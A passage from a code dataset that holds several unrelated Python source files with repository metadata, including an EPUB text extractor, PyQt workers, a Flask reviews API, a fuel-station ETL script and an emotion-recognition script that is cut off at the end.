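s = socket.create_connection(('127.0.0.1', 8005))
s.sendall(b'add-room: lobby\r\n\r\n')
s.sendall(b'broadcast: 1\r\nroom: lobby\r\nmessage: hello\r\n\r\n')
print(s.recv(1024))   # expect b'DONE\r\n\r\n' acknowledgements
s.close()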
generated_brainpedia.sample_shapes()\n all_generated_brain_data, all_generated_brain_data_tags = generated_brainpedia.all_data()\n all_generated_brain_data = Variable(torch.Tensor(all_generated_brain_data))\n\n if cuda_enabled:\n all_generated_brain_data = all_generated_brain_data.cuda()\n\n # Load classifier model\n classifier = Classifier(dimensionality=classifier_dimensionality,\n num_classes=generated_brain_data_tag_shape[0],\n cudaEnabled=cuda_enabled)\n classifier.load_state_dict(torch.load(path_to_classifier))\n\n # Compute predictions\n predictions = classifier.forward(all_generated_brain_data).data.cpu().numpy()\n\n # Now compute the mean kl-div\n N = len(all_generated_brain_data)\n split_scores = []\n\n for k in range(splits):\n part = predictions[k * (N // splits): (k + 1) * (N // splits), :]\n py = np.mean(part, axis=0)\n scores = []\n for i in range(part.shape[0]):\n pyx = part[i, :]\n scores.append(entropy(pyx, py))\n split_scores.append(np.exp(np.mean(scores)))\n\n return np.mean(split_scores), np.std(split_scores)\n\n\ninception_score = inception_score(path_to_generated_imgs_dir=args.synthetic_data_dir,\n path_to_generated_imgs_dir_cache=args.synthetic_data_dir_cache,\n downsample_scale=DOWNSAMPLE_SCALE,\n path_to_classifier=args.classifier_state_dict_path,\n classifier_dimensionality=CLASSIFIER_DIMENSIONALITY,\n cuda_enabled=CUDA,\n batch_size=BATCH_SIZE,\n splits=10)\n\ninception_score_str = \"INCEPTION SCORE: {0}\".format(inception_score)\nprint(inception_score_str)\nresults_f.write(inception_score_str)\n","repo_name":"BlissChapman/ICW-fMRI-GAN","sub_path":"evaluation/inception_score_evaluation.py","file_name":"inception_score_evaluation.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"37064058257","text":"\nimport zipfile\nfrom lxml import etree\n\ndef get_epub_info(fname):\n ns = {\n 'n':'urn:oasis:names:tc:opendocument:xmlns:container',\n 'pkg':'http://www.idpf.org/2007/opf',\n 'dc':'http://purl.org/dc/elements/1.1/'\n }\n\n # prepare to read from the .epub file\n zip = zipfile.ZipFile(fname)\n\n # find the contents metafile\n txt = zip.read('META-INF/container.xml')\n tree = etree.fromstring(txt)\n cfname = tree.xpath('n:rootfiles/n:rootfile/@full-path',namespaces=ns)[0]\n\n # grab the metadata block from the contents metafile\n cf = zip.read(cfname)\n tree = etree.fromstring(cf)\n p = tree.xpath('/pkg:package/pkg:metadata',namespaces=ns)[0]\n\n # repackage the data\n res = {}\n for s in ['title','language','creator','date','identifier']:\n res[s] = p.xpath('dc:%s/text()'%(s),namespaces=ns)[0]\n\n return res\n\n\nimport ebooklib\nfrom ebooklib import epub\ndef epub2thtml(epub_path):\n book = epub.read_epub(epub_path)\n chapters = []\n for item in book.get_items():\n if item.get_type() == ebooklib.ITEM_DOCUMENT:\n chapters.append(item.get_content())\n return chapters\n#epub2thtml(ebook) \n\nfrom bs4 import BeautifulSoup\nblacklist = [ '[document]', 'noscript', 'header', 'html', 'meta', 'head','input', 'script', \"style\" ]\n# there may be more elements you don't want, such as \"style\", etc.\ndef chap2text(chap):\n output = ''\n soup = BeautifulSoup(chap, 'html.parser')\n text = soup.find_all(text=True)\n for t in text:\n if t.parent.name not in blacklist:\n output += '{} '.format(t)\n return output\n\ndef thtml2ttext(thtml):\n Output = []\n for html in thtml:\n text = chap2text(html)\n # Remove accents\n a,b = 'áéíóúü','aeiouu'\n trans = str.maketrans(a,b)\n 
text = text.lower().translate(trans)\n Output.append(text)\n return Output\n\n\n\ndef epub2text(epub_path):\n chapters = epub2thtml(epub_path)\n ttext = thtml2ttext(chapters)\n return ttext\n\ndef filter_nonprintable(text):\n import itertools\n # Use characters of control category\n nonprintable = itertools.chain(range(0x00,0x20),range(0x7f,0xa0))\n # Use translate to remove all non-printable characters\n return text.translate({character:None for character in nonprintable})\ndef epub_to_clean_text(ebook):\n \"\"\"\n Convert an epub to text\n Arguments:\n ----------\n ebook: Path to the file\n \"\"\"\n out = epub2text(ebook)\n text=\"\"\n for chapter in out : \n text += filter_nonprintable(chapter) \n return text\n\n\n","repo_name":"jaimevalero/books_recommendation","sub_path":"books_recommendation/epubtotext.py","file_name":"epubtotext.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2981954779","text":"import sys\nfrom abc import abstractmethod\nfrom dataclasses import dataclass\nfrom enum import IntEnum\nfrom typing import Optional\n\nfrom PyQt5.QtCore import QRunnable, QObject, pyqtSlot, pyqtSignal\n\n\nclass Worker(QRunnable):\n \"\"\"\n Base QRunnable class.\n\n This class provides a base for QRunnables with signals that are automatically deleted.\n\n To use this class you have to assign the signals object of your concrete implementation\n to the `Worker.signals` attribute and implement `Worker.run_real()`\n \"\"\"\n\n def __init__(self):\n super(Worker, self).__init__()\n self.setAutoDelete(True)\n self.__signals: Optional[QObject] = None\n\n @property\n def signals(self) -> QObject:\n if self.__signals is None:\n raise RuntimeError(f\"Subclasses must assign '{type(self).__name__}.signals' QObject attribute\")\n return self.__signals\n\n @signals.setter\n def signals(self, obj: QObject):\n self.__signals = obj\n\n @abstractmethod\n def run_real(self):\n pass\n\n @pyqtSlot()\n def run(self):\n self.run_real()\n self.signals.deleteLater()\n\n\nclass QueueWorkerState(IntEnum):\n UNDEFINED = 0\n QUEUED = 1\n ACTIVE = 2\n\n\n@dataclass\nclass QueueWorkerInfo:\n app_name: str\n app_title: str\n worker_type: str\n state: QueueWorkerState\n progress: int = 0\n\n\nclass QueueWorker(Worker):\n \"\"\"\n Base queueable worker class\n\n This class is a specialization of the `Worker` class. 
It provides feedback signals to know\n    if a worker has started or finished.\n\n    To use this class you have to assign the signals object of your concrete implementation\n    to the `QueueWorker.signals` attribute, and implement `QueueWorker.run_real()` and `QueueWorker.worker_info()`\n    \"\"\"\n\n    class Signals(QObject):\n        started = pyqtSignal()\n        finished = pyqtSignal()\n\n    def __init__(self):\n        super(QueueWorker, self).__init__()\n        self.feedback = QueueWorker.Signals()\n        self.state = QueueWorkerState.QUEUED\n        self._kill = False\n\n    @pyqtSlot()\n    def run(self):\n        self.state = QueueWorkerState.ACTIVE\n        self.feedback.started.emit()\n        super(QueueWorker, self).run()\n        self.feedback.finished.emit()\n        self.feedback.deleteLater()\n\n    @abstractmethod\n    def worker_info(self) -> QueueWorkerInfo:\n        pass\n\n    def kill(self):\n        # killing is not supported yet\n        raise NotImplementedError\n\n","repo_name":"Dummerle/Rare","sub_path":"rare/shared/workers/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":538,"dataset":"github-code","pt":"40"} +{"seq_id":"29429558499","text":"'''\r\nThis proxy will help you to run your telegram bot on the pythonanywhere free hosting\r\n'''\r\n# start of online server proxy config\r\n\r\nimport urllib3\r\nimport telepot.api\r\nproxy_url = 'http://proxy.server:3128'\r\n\r\ntelepot.api._pools = {\r\n    'default': urllib3.ProxyManager(proxy_url=proxy_url, num_pools=3, maxsize=10, retries=False, timeout=30), }\r\n\r\ntelepot.api._onetime_pool_spec = (urllib3.ProxyManager, dict(proxy_url=proxy_url, num_pools=1, maxsize=1,\r\n                                                             retries=False, timeout=30))\r\n\r\n# end of online server proxy config\r\n","repo_name":"abdimk/babylon","sub_path":"babylon Translator/telepot proxy.py","file_name":"telepot proxy.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"71543047801","text":"#!/usr/bin/python\n# -*- coding: iso-8859-15 -*-\n\n# motion_compress.py\n\n# Compresses the motion data. The redundancy between temporal bands\n# and the bidirectional redundancy are removed. The first one means\n# that if a component of a vector is worth \"2x\" in subband \"i+1\",\n# that component of the corresponding vector in subband \"i\" should\n# be worth \"x\". The second one comes from the fact that if a\n# backward component is worth \"-x\", the corresponding forward\n# component should be worth \"x\". 
Finally, a reversible\n# entropy coder is used to compress the residues.\n\nimport os\nimport sys\nfrom GOP import GOP\nfrom subprocess import check_call\nfrom subprocess import CalledProcessError\nfrom MCTF_parser import MCTF_parser\n\n#MOTION_CODER_NAME = \"gzip\"\n#MOTION_CODER_NAME = \"kdu_v_compress\"\nMCTF_MOTION_CODEC = os.environ[\"MCTF_MOTION_CODEC\"]\n\nblock_size = 16\nblock_size_min = 16\nGOPs = 1\npixels_in_x = 352\npixels_in_y = 288\nTRLs = 5\n\nparser = MCTF_parser(description=\"Compress the motion data.\")\nparser.block_size(block_size)\nparser.block_size_min(block_size_min)\nparser.GOPs(GOPs)\nparser.pixels_in_x(pixels_in_x)\nparser.pixels_in_y(pixels_in_y)\nparser.TRLs(TRLs)\n\nargs = parser.parse_known_args()[0]\nif args.block_size:\n    block_size = int(args.block_size)\nif args.block_size_min:\n    block_size_min = int(args.block_size_min)\nif args.GOPs:\n    GOPs = int(args.GOPs)\nif args.pixels_in_x:\n    pixels_in_x = int(args.pixels_in_x)\nif args.pixels_in_y:\n    pixels_in_y = int(args.pixels_in_y)\nif args.TRLs:\n    TRLs = int(args.TRLs)\n\nif block_size < block_size_min:\n    block_size_min = block_size\n\n# The motion fields are compressed losslessly, generating an\n# independent file for each temporal resolution level in a different\n# stream and for each GOP. The compression is performed thinking of\n# how the decompressor is going to carry out the decompression. At\n# the first level the decompressor will find a bidirectional motion\n# field that has only been decorrelated bidirectionally\n# (bidirectional decorrelation exploits the redundancy that exists\n# in a bidirectional vector, where the vector in one direction is\n# usually equal to the other one, although with the opposite sign).\n# Once the field of the first level has been restored, it can serve\n# as a reference for two fields of the next resolution level\n# (interlevel decorrelation). Specifically, we divide the motion\n# vectors by two and we already have the prediction. At this second\n# resolution level (and the following ones) it is not necessary to\n# decorrelate them bidirectionally, since the interlevel\n# decorrelation, starting from correlated bidirectional fields, will\n# produce the bidirectional decorrelation automatically.\n\ngop=GOP()\nGOP_size = gop.get_size(TRLs)\npictures = GOPs * GOP_size + 1\n\n# We start by applying the interlevel decorrelation.\niterations = TRLs - 1\niteration = 1\nfields = pictures / 2\nblocks_in_y = pixels_in_y / block_size\nblocks_in_x = pixels_in_x / block_size\n\n\nwhile iteration < iterations:\n\n    # Decorrelate the motion fields between resolution\n    # levels. \n    try:\n        check_call(\"mctf interlevel_motion_decorrelate\"\n                   + \" --blocks_in_x=\" + str(blocks_in_x)\n                   + \" --blocks_in_y=\" + str(blocks_in_y)\n                   + \" --fields_in_predicted=\" + str(fields)\n                   + \" --predicted=\" + \"motion_filtered_\" + str(iteration)\n                   + \" --reference=\" + \"motion_filtered_\" + str(iteration+1)\n                   + \" --residue=\" + \"motion_residue_\" + str(iteration),\n                   shell=True)\n    except CalledProcessError:\n        sys.exit(-1)\n\n# Compute the block size used in this temporal iteration.\n    block_size = block_size / 2\n    if (block_size < block_size_min):\n        block_size = block_size_min\n\n    fields /= 2\n    iteration += 1\n    blocks_in_y = pixels_in_y / block_size\n    blocks_in_x = pixels_in_x / block_size\n\n# Now we bidirectionally decorrelate the lowest temporal resolution\n# level. 
The last number of blocks in X and in Y computed\n# in the previous loop should still be valid at this point. The same\n# goes for the \"iteration\" variable.\ntry:\n    check_call(\"mctf bidirectional_motion_decorrelate\"\n               + \" --blocks_in_x=\" + str(blocks_in_x)\n               + \" --blocks_in_y=\" + str(blocks_in_y)\n               + \" --fields=\" + str(fields)\n               + \" --input=\" + \"motion_filtered_\" + str(iteration)\n               + \" --output=\" + \"motion_residue_\" + str(iteration),\n               shell=True\n               )\nexcept CalledProcessError:\n    sys.exit(-1)\n\n# Remove from the motion field stream those fields that are no\n# longer used because they refer to I pictures.\n\n# Finally, we compress. \niteration = 1\nfields = pictures / 2\nwhile iteration <= iterations:\n\n    try:\n        check_call(\"mctf motion_compress_\" + MCTF_MOTION_CODEC\n                   + \" --blocks_in_x=\" + str(blocks_in_x)\n                   + \" --blocks_in_y=\" + str(blocks_in_y)\n                   + \" --iteration=\" + str(iteration)\n                   + \" --fields=\" + str(fields)\n                   + \" --file=\" + \"motion_residue_\" + str(iteration),\n                   shell=True\n                   )\n    except CalledProcessError:\n        sys.exit(-1)\n\n    fields /= 2\n\n    iteration += 1\n\n","repo_name":"josejuansanchez/cr_mc_j2k","sub_path":"MCTF/src/motion_compress.py","file_name":"motion_compress.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"21983170437","text":"import os\nimport time\nfrom pathlib import Path as caminho\n\nimport pandas as pd\n\nfrom B_Def_Global import (\n    GetEnv,\n    conecta_bd_generico,\n    convert_tempo,\n    criar_chaves_estrangeiras_tabelas,\n    criar_chaves_primaria_tabelas,\n    download_arquiv_barprogress,\n    funçao_barprogress,\n    inserir_dados_faltantes_tabelas,\n    leitura_csv_insercao_bd_sql,\n    limpar_terminal,\n    log_retorno_erro,\n    log_retorno_info,\n    print_divisor_inicio_fim,\n    print_parcial_final_log_inf_retorno,\n    remover_repetidos_tabelas,\n    verificar_dados_faltantes_tabelas,\n    verificar_repetidos_tabelas,\n)\nfrom Z_Logger import Logs\n\nlogs = Logs(filename=\"logs.log\")\n\n\ndef postos_combustiveis_anp():\n    \"\"\"Function to download the postos_combustiveis data from the ANP API\n    \"\"\"\n\n    path_anp = GetEnv('ANP_FILES_PATH')\n    url_api = GetEnv('URL_ANP_POSTO_COMBUSTIVEIS')\n    name_file = 'tb_postos_combustiveis_anp'\n    ext_file = '.csv'\n    file_path = os.path.join(path_anp, name_file+ext_file)\n\n    try:\n        insert_start = time.time()\n\n        download_arquiv_barprogress(url_api,\n                                    name_file,\n                                    '.csv',\n                                    file_path,\n                                    False)\n\n        tmp = pd.read_csv(file_path,\n                          # index_col=False,\n                          sep=';',\n                          encoding='ANSI')\n\n        # Convert to the date format style '%y%m%d'\n        tmp['DATAPUBLICACAO'] = pd.to_datetime(\n            tmp['DATAPUBLICACAO']).dt.date\n        tmp['DATAVINCULACAO'] = pd.to_datetime(\n            tmp['DATAVINCULACAO']).dt.date\n\n        print(tmp)\n\n        path = caminho(file_path)\n        path.unlink()\n\n        # Save the dataframe to a csv\n        local_save_csv = os.path.join(path_anp, name_file+ext_file)\n\n        # print(local_save_csv)\n        tmp.to_csv(local_save_csv,\n                   index=None,  # Do not write the index\n                   encoding='utf-8'  # Use UTF-8 to keep the formatting\n                   , sep=';')  # Use semicolon as the separator\n        # , na_rep='0') # Replace NaN with 0\n\n        insert_end = time.time()\n\n        print_parcial_final_log_inf_retorno('download',\n                                            insert_start,\n                                            insert_end,\n                                            name_file,\n                                            'parcial')\n\n    except Exception as text:\n\n        log_retorno_erro(text)\n\n\ndef inserir_dados_anp_bd():\n    \"\"\"Function to insert csv files into the postgres database\n    \"\"\"\n\n    try:\n\n        insert_start = time.time()\n\n        extracted_files = 
GetEnv('ANP_FILES_PATH')\n\n        # File/table data (municipios_anp)\n        # Create the table\n        table_create_sql_postos_combustiveis_anp = r'''\n        CREATE TABLE IF NOT EXISTS \"tb_anp_postos_combustiveis\" (\n        \"cod_simp_anp\" INT, \n        \"autorizacao_anp\" varchar(16), \n        \"data_publicacao_anp\" DATE,\n        \"razao_social_anp\" varchar(255), \n        \"id_cnpj_completo_anp\" BIGINT, \n        \"endereco_anp\" varchar(255),\n        \"complemento_anp\" varchar(255),\n        \"bairro_anp\" varchar(255),\n        \"cep_anp\" varchar(12),\n        \"uf_anp\" varchar(4),\n        \"municipio_anp\" varchar(255),\n        \"bandeira_anp\" varchar(25),\n        \"data_vinculacao_anp\" DATE);\n        '''\n        # Insert the csv into the database\n        leitura_csv_insercao_bd_sql('tb_postos_combustiveis_anp',\n                                    'tb_anp_postos_combustiveis',\n                                    table_create_sql_postos_combustiveis_anp,\n                                    'anp',\n                                    extracted_files)\n\n        insert_end = time.time()\n\n        print_parcial_final_log_inf_retorno('',\n                                            insert_start,\n                                            insert_end,\n                                            '',\n                                            'final')\n\n        print_parcial_final_log_inf_retorno(f'inserção no banco de dados os dados do ANP',\n                                            insert_start,\n                                            insert_end,\n                                            '',\n                                            'geral')\n\n    except Exception as text:\n\n        log_retorno_erro(text)\n\n\ndef dados_faltantes_anp():\n    \"\"\"Function to check/insert missing values in the specified tables\n    \"\"\"\n\n    try:\n\n        insert_start = time.time()\n        base_dados = GetEnv('DB_NAME')\n\n        def faltantes_estabelecimentos():\n\n            # Insert the missing values of the country table\n            tabela_temp = 'tb_anp_postos_combustiveis'\n            tabela_temp_origem = 'tb_rfb_estabelecimentos'\n            coluna_temp1 = 'id_cnpj_completo_anp'\n            coluna_temp1_origem = 'id_cod_cnpj_completo_num'\n            output_erros = (os.path.join(GetEnv('ANP_OUTPUT_ERROS_PATH'),\n                                         f'FALTANTES_CNPJ_{tabela_temp_origem}.csv'))\n\n            '''verificar_dados_faltantes_tabelas(base_dados,\n                                              tabela_temp,\n                                              tabela_temp_origem,\n                                              coluna_temp1,\n                                              coluna_temp1_origem,\n                                              1,\n                                              output_erros)'''\n\n            nome_coluna_temp1 = 'id_cod_cnpj_completo_num'\n            nome_coluna_temp2 = 'nome_fantasia'\n\n            inserir_dados_faltantes_tabelas(base_dados,\n                                            tabela_temp,\n                                            tabela_temp_origem,\n                                            coluna_temp1,\n                                            coluna_temp1_origem,\n                                            nome_coluna_temp1,\n                                            nome_coluna_temp2,\n                                            1,\n                                            output_erros)\n\n        insert_end = time.time()\n\n        print_parcial_final_log_inf_retorno(f'verificação/inserção de valores faltantes nas tabelas na {base_dados}',\n                                            insert_start,\n                                            insert_end,\n                                            '',\n                                            'geral')\n\n        funçao_barprogress([faltantes_estabelecimentos],\n                           'green')\n\n    except Exception as text:\n\n        log_retorno_erro(text)\n\n\ndef criar_indices_anp():\n    \"\"\"Function to create the indexes on the specified tables\n    \"\"\"\n\n    try:\n\n        insert_start = time.time()\n        base_dados = GetEnv('DB_NAME')\n\n        def chaves_estrangeiras():\n\n            def chave_postos_combustiveis_anp():\n\n                # Create foreign keys on the estabelecimentos table for the RFB municipios\n                tabela_temp = 'tb_anp_postos_combustiveis'\n                tabela_temp_origem = 'tb_rfb_estabelecimentos'\n                nome_fk_coluna = 'FK_id_cod_cnpj_completo_num'\n                coluna_temp1 = 'id_cnpj_completo_anp'\n                coluna_temp1_origem = 'id_cod_cnpj_completo_num'\n\n                criar_chaves_estrangeiras_tabelas(base_dados,\n                                                  tabela_temp,\n                                                  tabela_temp_origem,\n                                                  nome_fk_coluna,\n                                                  coluna_temp1,\n                                                  coluna_temp1_origem)\n            chave_postos_combustiveis_anp()\n\n        chaves_estrangeiras()\n\n        insert_end = time.time()\n\n        print_parcial_final_log_inf_retorno(f'criação de chaves primárias e estrangeiras nas tabelas na {base_dados}',\n                                            insert_start,\n                                            insert_end,\n                                            '',\n                                            'geral')\n\n    except Exception as text:\n\n        log_retorno_erro(text)\n\n\ndef sequencia_anp():\n\n    try:\n\n        insert_start = time.time()\n        base_dados = GetEnv('DB_NAME')\n\n        
limpar_terminal()\n\n funçao_barprogress([postos_combustiveis_anp,\n inserir_dados_anp_bd,\n dados_faltantes_anp,\n criar_indices_anp],\n 'red')\n\n insert_end = time.time()\n\n print_parcial_final_log_inf_retorno(f'inserção no banco, remoção de cnpj duplicados e crição de chaves primárias e estrangeiras nas tabelas do ANP na {base_dados}',\n insert_start,\n insert_end,\n '',\n 'geral')\n\n except Exception as text:\n\n log_retorno_erro(text)\n\n# sequencia_anp():\n","repo_name":"allanbmartins/Projeto_ETL_RFB_IBGE_ANP","sub_path":"src/E_Script_ANP.py","file_name":"E_Script_ANP.py","file_ext":"py","file_size_in_byte":9205,"program_lang":"python","lang":"pt","doc_type":"code","stars":36,"dataset":"github-code","pt":"40"} +{"seq_id":"2093985689","text":"import numpy as np\n\nempContactsArray = np.zeros((75, 75), int)\nday1 = np.zeros((75, 75), int)\nday2 = np.zeros((75, 75), int)\nday3 = np.zeros((75, 75), int)\nday4 = np.zeros((75, 75), int)\n\nsecondsInDay = 86400\n\ntemporalEdgeList = open('Data/temporalEdgeList.txt')\nnext(temporalEdgeList)\nfor line in temporalEdgeList:\n splitLine = line.rstrip().split('\\t')\n t = int(splitLine[0])\n i = int(splitLine[1])\n j = int(splitLine[2])\n Si = splitLine[3]\n Sj = splitLine[4]\n empContactsArray[i][j] += 1\n empContactsArray[j][i] += 1\n\n if t <= secondsInDay:\n day1[i][j] += 1\n day1[j][i] += 1\n elif t <= (secondsInDay*2):\n day2[i][j] += 1\n day2[j][i] += 1\n elif t <= (secondsInDay*3):\n day3[i][j] += 1\n day3[j][i] += 1\n elif t <= (secondsInDay*4):\n day4[i][j] += 1\n day4[j][i] += 1\n \ntemporalEdgeList.close()\n\nempDailyContactArrays = [day1, day2, day3, day4]\n","repo_name":"mariebergan/Hospital","sub_path":"Model/empContacts.py","file_name":"empContacts.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12873259538","text":"#!/usr/bin/python3\n\"\"\"A view for reviews of places\"\"\"\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.place import Place\nfrom models.review import Review\nfrom models.user import User\nfrom flask import jsonify, abort, request\n\n\n@app_views.route('/places/<place_id>/reviews', strict_slashes=False,\n methods=[\"GET\"])\ndef get_reviews(place_id):\n \"\"\"Retrieve reviews for a place\"\"\"\n place = storage.get(Place, place_id)\n if not place:\n abort(404)\n return jsonify({\"error\": \"Not found\"})\n reviews = storage.all(Review)\n review_list = []\n\n for k, v in reviews.items():\n if v.place_id == place_id:\n review_list.append(v.to_dict())\n return jsonify(review_list)\n\n\n@app_views.route('/reviews/<review_id>', strict_slashes=False, methods=[\"GET\"])\ndef get_review(review_id):\n \"\"\"Retrieve a review\"\"\"\n review = storage.get(Review, review_id)\n if not review:\n abort(404)\n return jsonify({\"error\": \"Not found\"})\n\n return jsonify(review.to_dict())\n\n\n@app_views.route('/reviews/<review_id>', strict_slashes=False,\n methods=[\"DELETE\"])\ndef delete_review(review_id):\n \"\"\"Delete a review\"\"\"\n review = storage.get(Review, review_id)\n if not review:\n abort(404)\n return jsonify({\"error\": \"Not found\"})\n storage.delete(review)\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route('/places/<place_id>/reviews', strict_slashes=False,\n methods=[\"POST\"])\ndef create_review(place_id):\n \"\"\"Create a review\"\"\"\n if not request.json:\n abort(400)\n return jsonify({\"error\": \"Not a JSON\"})\n if 'user_id' not in request.json:\n 
abort(400)\n        return jsonify({\"error\": \"Missing user_id\"})\n    if 'text' not in request.json:\n        abort(400)\n        return jsonify({\"error\": \"Missing text\"})\n\n    place = storage.get(Place, place_id)\n    if not place:\n        abort(404)\n        return jsonify({\"error\": \"Not found\"})\n    user = storage.get(User, request.get_json()['user_id'])\n    if not user:\n        abort(404)\n        return jsonify({\"error\": \"Not found\"})\n\n    new_review = Review(**request.get_json())\n    setattr(new_review, 'place_id', place_id)\n    new_review.save()\n    return jsonify(new_review.to_dict()), 201\n\n\n@app_views.route('/reviews/<review_id>', strict_slashes=False, methods=[\"PUT\"])\ndef update_review(review_id):\n    \"\"\"Update a review\"\"\"\n    if not request.json:\n        abort(400)\n        return jsonify({\"error\": \"Not a JSON\"})\n\n    review_atr = request.get_json(silent=True)\n    review = storage.get(Review, review_id)\n    if not review:\n        abort(404)\n        return jsonify({\"error\": \"Not found\"})\n\n    for k, v in review_atr.items():\n        if k not in [\"id\", \"created_at\", \"updated_at\", \"user_id\", \"place_id\"]:\n            setattr(review, k, v)\n\n    review.save()\n    return jsonify(review.to_dict())\n","repo_name":"Hoseafavour123/AirBnB_clone_v3","sub_path":"api/v1/views/places_reviews.py","file_name":"places_reviews.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"10790462415","text":"# Time: O(n)\n# Space: O(1)\n\nimport collections\n\n\nclass Solution(object):\n    def slowestKey(self, releaseTimes, keysPressed):\n        \"\"\"\n        :type releaseTimes: List[int]\n        :type keysPressed: str\n        :rtype: str\n        \"\"\"\n        result, lookup = 'a', collections.Counter()\n        for i, c in enumerate(keysPressed):\n            lookup[c] = max(lookup[c], releaseTimes[i]-(releaseTimes[i-1] if i > 0 else 0))\n            if lookup[c] > lookup[result] or lookup[c] == lookup[result] and c > result:\n                result = c\n        return result\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/slowest-key.py","file_name":"slowest-key.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"71551636281","text":"def solution(participant, completion):\n    hash_dict = {}\n    sum_hash = 0\n\n    # hash - key, value pairs exist; this is the dictionary data structure\n    # [hash(part)] - key / part - value\n\n    # 1. Compute the hash of each name in the participant list and add up the hash values.\n    for part in participant:\n        hash_dict[hash(part)] = part\n        sum_hash += hash(part)\n\n    # 2. Subtract the hash of each name in the completion list.\n    for comp in completion:\n        sum_hash -= hash(comp)\n\n    # 3. 
The remaining value is the hash of the runner who did not finish.\n    return hash_dict[sum_hash]\n\n\nprint(solution([\"leo\", \"kiki\", \"eden\"], [\"eden\", \"kiki\"]))","repo_name":"DevYJShin/Algorithm_Programmers","sub_path":"28_완주하지못한선수.py","file_name":"28_완주하지못한선수.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20620715089","text":"#Import required modules\nimport cv2\nimport glob\nimport random\nimport math\nimport numpy as np\nimport dlib\nimport itertools\nfrom sklearn.svm import SVC\nimport pickle\nimport sys\nimport os\n\nemotions = [\"anger\", \"disgust\", \"fear\", \"happy\", \"sadness\", \"surprise\",\"neutral\"] #Define emotions\nnew_emotions = [\"anger\",\"happy\", \"neutral\", \"sadness\"] #Define emotions\ndest='F:\\Chaos\\EmotionRecognition\\Application\\Results'\n\nclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\ndetector = dlib.get_frontal_face_detector() #Face detector\npredictor = dlib.shape_predictor(\"F:\\Chaos\\EmotionRecognition\\Download_CK+\\shape_predictor_68_face_landmarks.dat\\shape_predictor_68_face_landmarks.dat\") #Landmark identifier. Set the filename to whatever you named the downloaded file\ndir2='F:\\Chaos\\EmotionRecognition\\Application\\model\\images'\ndir1='F:\\Chaos\\EmotionRecognition\\Application\\\\testData'\ndir3='F:\\Chaos\\EmotionRecognition\\Application\\dataset'\ndir4='F:\\Chaos\\EmotionRecognition\\Application\\\\trainData'\ndir5='F:\\Chaos\\EmotionRecognition\\Application\\sorted_set'\n\ndef shuffle_files(emotion):\n\n    files = glob.glob(dir5+\"\\\\\"+emotion+\"\\*\")\n    random.shuffle(files)\n    training = files[:int(len(files)*0.8)] #get first 80% of file list\n    prediction = files[-int(len(files)*0.2):] #get last 20% of file list\n    return training, prediction\n\n\ndef getSlicedData(emotion):\n\n    files = glob.glob(dir1+\"\\\\\"+emotion+\"\\*\")\n    #random.shuffle(files)\n    training = files[:int(len(files))] #full data\n    return training\n\n\ndef getLandmarks(image): #Function to detect landmarks in image\n\n    landmarks_Vector=[]\n    xList=[]\n    yList=[]\n\n    detections =detector(image,1) #Detect\n\n    for k,d in enumerate(detections):\n\n        shape = predictor(image,d)\n        for i in range(1,68):\n            xList.append(float(shape.part(i).x))\n            yList.append(float(shape.part(i).y))\n\n        xmean = np.mean(xList) #Calculate mean for both co-ordinates\n        ymean = np.mean(yList)\n        xcentral = [(x - xmean) for x in xList] #Taking distance from the center\n        ycentral = [(y-ymean) for y in yList]\n\n        for x,y,w,z in zip(xcentral,ycentral,xList,yList):\n\n            landmarks_Vector.append(w)\n            landmarks_Vector.append(z)\n            meannp=np.asarray((ymean,xmean))\n            coorp = np.asarray((z,w))\n            dist = np.linalg.norm(coorp-meannp) #Square root representation\n\n            landmarks_Vector.append(dist)\n            landmarks_Vector.append((math.atan2(y, x)*360)/(2*math.pi)) #Angle method\n\n\n\n    return landmarks_Vector\n\n\n#for generating the model\ndef generateModel():\n\n    training_data = []\n    training_labels = []\n\n    for emotion in emotions:\n\n\n        files=getSlicedData(emotion)\n        for item in files:\n            image = cv2.imread(item)\n            gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n            clahe_image = clahe.apply(gray)\n            landmarks_Vector=getLandmarks(clahe_image)\n            if landmarks_Vector:\n                training_data.append(landmarks_Vector)\n                training_labels.append(emotions.index(emotion))\n    print ('Length {0} and Size {1}'.format(len(training_data),sys.getsizeof(training_data)))\n    print ('Length {0} and Size 
